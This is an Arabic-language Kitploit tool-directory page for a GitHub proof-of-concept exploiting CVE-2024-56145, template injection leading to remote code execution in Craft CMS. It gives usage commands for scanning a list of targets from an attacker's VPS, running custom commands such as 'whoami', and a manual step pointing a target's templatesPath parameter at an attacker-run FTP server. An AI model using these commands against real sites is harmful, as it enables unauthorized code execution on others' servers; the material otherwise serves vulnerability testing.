Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-56145-craftcms-rce — CVE-2024-56145 SSTI إلى RCE - twig templates | Kitploit
أدوات/GitHubGitHub/sachinart/cve-2024-56145-craftcms-rce
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubsachinart/cve-2024-56145-craftcms-rce

CVE-2024-56145-craftcms-rce

CVE-2024-56145 SSTI إلى RCE - twig templates

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
43منذ سنة واحدةلم تتم المراجعة بعد
مشاركة

قبل تشغيل السكربت مرة أخرى، قم بـ

fuser -k 6666/tcp

الاستخدام -

python3 poc.py -f targets.txt -i 127.0.0.1 -pr 4 -t 200

يمكن استخدام أمر مخصص مثل python3 poc.py -f targets.txt -i 127.0.0.1 -c "whoami"

-i هو عنوان IP الخاص بك أو عنوان IP الخاص بـ VPS (استخدم ذلك عن طريق تنفيذ ipconfig / ifconfig).

مثل - python3 poc.py -f targets.txt -i 165.22.104.140 -pr 4 -t 200

الاستغلال اليدوي، قم بتشغيل poc.py أعلاه ضد الأهداف التي لديك، سترى ملف مخرجات يحتوي على الأهداف المعرضة للخطر

والآن ماذا؟ لديك هدف معرض للخطر ولكنك تريد اللعب أكثر؟ لذا أضفت poc2.py وهو للاختبار اليدوي ضد الهدف، كيف تفعل ذلك؟ قم بـ

fuser -k 6666/tcp
root@kitploit:~
1. قم بتشغيل poc2.py (المنفذ 6666 سيبدأ كـ FTP).
2. افتح المتصفح على yourtarget.com/?--templatesPath=ftp://VPS-IP:6666/
3. سترى -

image

كتب بواسطة Chirag Artani (https://x.com/Chirag99Artani)

تنزيل الأداة